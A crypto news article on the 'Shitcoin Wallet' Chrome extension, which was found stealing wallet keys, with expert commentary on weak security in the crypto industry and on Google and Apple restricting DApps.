The “Shitcoin Wallet” debacle shined a light on crypto security issues. Experts weigh in on how companies are caught in the balance.
The cryptocurrency sector has many criticisms. One is that it can appear impenetrable to newcomers. Another is that it is probably easier to lose money investing in crypto than in most other areas of finance. What’s more, these issues can combine to create a lucrative environment for hackers with nefarious intentions.
Chrome browser extension makes a stink
By virtue of the fluctuations and hype that influence the markets, investors are often highly motivated to buy certain cryptocurrencies. Regardless of their background, all face the same initial hurdles: Where to buy the cryptocurrency and where to store it?
Due in part to the lack of robust regulation and limited legal ability of often under-funded and over-stretched law enforcement, there is no uniform way to find a risk-free way of buying cryptocurrency for the uninitiated.
Many scam wallets and exchanges have high-quality and well-designed websites that create a convincing illusion of authenticity. Although the mechanics of both cryptocurrencies and blockchain are highly complex, everyday investors are not expected to be technology experts.
While many investors might not be coder-extraordinaires, there are fortunately a number of experts who detect something odd online and have the know-how to dive into the code and see what’s truly going on. In only the last few days, the crypto world learned of the latest scam to part investors from their precious funds.
Caught with hands in the crypto jar
On Dec. 30, Harry Denley, a security officer at MyCrypto, spotted that an Ethereum wallet, known as “Shitcoin Wallet,” was reportedly injecting malicious javascript code from open browser windows to steal data from customers.
After examining the code, Denley noted that the chrome extension functions by downloading javascript files from a remote server. Denley related to Cointelegraph how Shitcoin Wallet was brought to his attention and what exactly set off the alarm bells for him:
“Since we started calling out, indexing and investigating a bunch of different scams, malware and phishing kits, we have gained a network of people who consistently report to us. One of those people reported Shitcoin Wallet to me directly with a brief investigation of the behaviour of injecting `content_.js` into the current browser tab to steal secrets. Before the report to me, I had never heard of it. I then downloaded the extension on a VM and viewed the code to confirm the report and find other malicious behaviour — the wallet create behaviour of the extension also sent the fresh secrets to their backend.”
“Shitcoin” is a derogatory term that frequently pops up in Bitcoin (BTC) maximalist circles, as well as among investors who have a particular belief in the inherent qualities of one digital currency of their choice over all others.
While it’s true that the online world of crypto discussion has an oversupply of irony and trolling, which is often built into the branding of companies and platforms, many commentators felt that the provocatively named “Shitcoin Wallet” should have been a big enough warning for investors to steer clear. A number of Twitter users wrote of their disbelief that people would mistake the chrome extension for a legitimate service.
Cybersecurity expert Kevin Beaumont appeared to tweet his incredulity at the idea that someone would voluntarily install a plugin called “Shitcoin Wallet” after receiving an email from his office’s security team:
“First email at work today, our threat intelligence provider having to write up malware in ‘Shitcoin wallet.’ Damn, I was just about to install Shitcoin Wallet plugin.”
Likewise, self-described open-source evangelist at Red Hat Jan Wildeboer also tweeted that the name should set off alarm bells for investors:
“Who would even install an extension with that name? #WhereIsMySurprisedFace A Google Chrome extension named Shitcoin Wallet is stealing passwords and wallet private keys.”
Experts weigh in on security deficit in crypto
Hartej Sawhney, CEO of Las Vegas-based cybersecurity agency Zokyo Labs, told Cointelegraph that getting crypto companies to have a robust cybersecurity policy in place is easier said than done due in part to an over-reliance on insurance policies and staffing restrictions:
“Crypto is a new industry that is relatively unregulated. The challenge of having a cybersecurity program is needing to have qualified staff both in-house and third-party. Basic standards such as hiring third party ethical hackers to regularly conduct penetration testing are not being followed. In Crypto, if hackers can identify and exploit protocol flaws, then they will compromise the entire network, since the security chain is protocol, then exchange, and then wallet.”
The lack of comprehensive regulatory structures and security standards in the crypto industry is decried from both inside and out. Sawhney explained to Cointelegraph that many companies do not even have staff assigned for general tech oversight and that the industry suffers from a lack of incentive for those qualified to fill the gap:
“Many major crypto companies do not even have an assigned Chief Information Security Officer or a basic cybersecurity program that highlights what steps to even take when facing a breach. There is also a lack of incentive for world-class cybersecurity specialists to focus on the crypto industry. An extremely specialized skill set is needed to focus on the intersection of cybersecurity and cryptocurrency.”
For Charles Phan, chief technology officer of the London-based exchange Interdax, a joint effort needs to be made by both law enforcement and crypto businesses in order to boost cybersecurity defences and awareness. Phan went on to add:
“Many aspects of cybercrime also require specific knowledge so there needs to be communication between experts, law enforcement, investors and the ecosystem in general to weed out bad players. Prevention in the form of education is also important.”
Aanand Krishnan, CEO and founder of Tala Security, said that understanding the reasoning for the rise in attacks is simple: Security is just not up to scratch. Krishnan told Cointelegraph:
“It may be stating the obvious, but attacks are on the rise because attack techniques continue to innovate while security effectiveness has waned. This “State of the market” requires either more security investment or different thinking. Since security budgets remain tight new approaches are required. Many of these attacks leverage JavaScript vulnerabilities that can be addressed by standards-based security measures. Surprisingly these measures are infrequently deployed.”
Is Google masking its intentions?
While the Shitcoin Wallet extension was rightly spotted and outed, not all online platforms get the treatment they feel they deserve. Since the watershed moment of Facebook’s Libra announcement in 2019, the world’s tech behemoths have begun scaling up their operations in the cryptocurrency industry. With the relatively short-lived “Libra effect” aside, the actions of influential and powerful companies do not always have a positive impact.
In a world where mobile phones play an ever more central role in daily life, the presence of an app on either Apple’s App Store or Google’s Play App Store can be a matter of life or death for companies. Apps that are found to fall foul of regulations are frequently removed from the stores. While platforms must exert prudence over what apps they make available for customers, security measures do not always go as planned.
In late December 2019, the prominent Chrome extension and wallet service provider MetaMask received an unwanted Christmas present in the form of a Google blacklisting. Fortunately for MetaMask, the ban only lasted a week before it was eventually overturned. Google’s reasoning for the ban stems from the tech giant mistaking the browser extension for a mining app, which are not permitted.
Although MetaMask may well have been temporarily canceled by Google, the short blacklisting unearthed other issues for the wallet provider. As reported in late December, a MetaMask contributor alleged that the team was totally overwhelmed and had not received adequate support from its parent firm, ConsenSys.
While popular crypto companies being stretched under the pressures of rapidly growing demand is far from uncommon, the contributor also alleged that the company was neither transparent nor decentralized, claiming that the project’s code was “of low quality, full of technical debt.”
The contributor’s comments elicited a response from Daniel Finlay, a MetaMask employee, who challenged what he described as the alarmist tone of someone who was not an official team member. Nonetheless, Finlay admitted that some of the criticisms were accurate, particularly regarding that of the project’s code. Finlay told Cointelegraph that he felt uncomfortable about the mounting bans on crypto-related companies and accounts occurring across technology platforms:
“I very much hope that this was an honest mistake on the part of Google’s reviewers, but in combination with all the crypto YouTube bans, it definitely puts me at disease about how Google is engaging with decentralizing technologies.”
Former federal enforcement attorney and regulatory and government investigations attorney with Kansas City-based Kennyhertz Perry LLC Braden Perry, explained to Cointelegraph that while Google has considerable influence over the proliferation of DApps on its platforms, the lack of regulatory clarity and clash between security and demand often means that the tech giant finds itself in a tricky situation:
“They have altered course and allowed apps after further review. Take MetaMask as an example — Google disallowed it and then based on the reaction for the developers and public, reversed course and allows the app. Google is in a difficult position, trying to ensure safety to the public that downloads Dapps while staying relevant to the developers behind the Dapps.”
Apple is also wary of DApps
MetaMask was not the only company to draw the ire of one of the so-called Big Four of tech. According to a Reddit post published on Dec. 28, the United States-based cryptocurrency exchange and wallet provider Coinbase warned users that it might be forced to remove the DApp browser feature from its wallet application in order to comply with Apple’s mobile App Store policy.
Coinbase CEO Brian Armstrong commented on the post, outlining his view that Apple was undergoing a process of eliminating DApps from the App Store:
“This is really unfortunate to see. Apple seems to be eliminating usage of Dapps from the App Store. […] It’s beyond Coinbase and IMO a very big threat to the ecosystem.”
For Zokyo Lab’s Sawhney, the actions of many big tech companies are tantamount to censorship, “It’s all about censorship and control. Tech giants, such as Apple and Google, want their customers to have limited exposure to the multi-billion dollar DApp market.”
For MyCrypto’s Denley, the question of Google’s stance toward DApps is not quite so simple. While Denley recognizes that Google has made some questionable decisions regarding the execution of its policy, part of this is down to a lack of clarity:
“Google’s approach to DApp/cryptocurrency censorship is not consistent, so it’s not justified in my view as the rules are too muddy to know which side of the line you stand.”
Denley added that once there is greater clarity about what should and shouldn’t be allowed regarding the ability to censor and police poor quality or malicious cryptocurrency content, it will be easier for companies and commentators alike to pick sides. Braden Perry outlined his view to Cointelegraph that through regulation, it may be possible to strike a healthy balance between decentralization and security:
“Regulation is inevitable. How it will affect crypto depends on what that regulation looks like. A hasty attempt to reign in every potential for security would likely fail and cause more damage than good to the technology. But a well-designed regulatory scheme that aims to affect the bad actors and not overregulate the technology would likely be a positive for crypto, and this would require a collaborative effort between congress, regulators, big tech (Google, Apple, etc) and developers.”
Taking a market-based approach, Tala Security’s Krishnan argued that decentralization had already been accepted. Krishnan’s comments also echoed the growing consensus among business leaders and legal figures in the cryptocurrency industry that the only way forward is the creation of standards-based security and information sharing in order to turn the tide against the proliferation of malicious actors in the industry:
“Standards-based security models where information-sharing, often from the best and brightest, offers hope for defining the required security model of the future. Embracing these models and contributing to their advancement is the kind of different thinking that’s required to ensure that the attackers don’t always win.”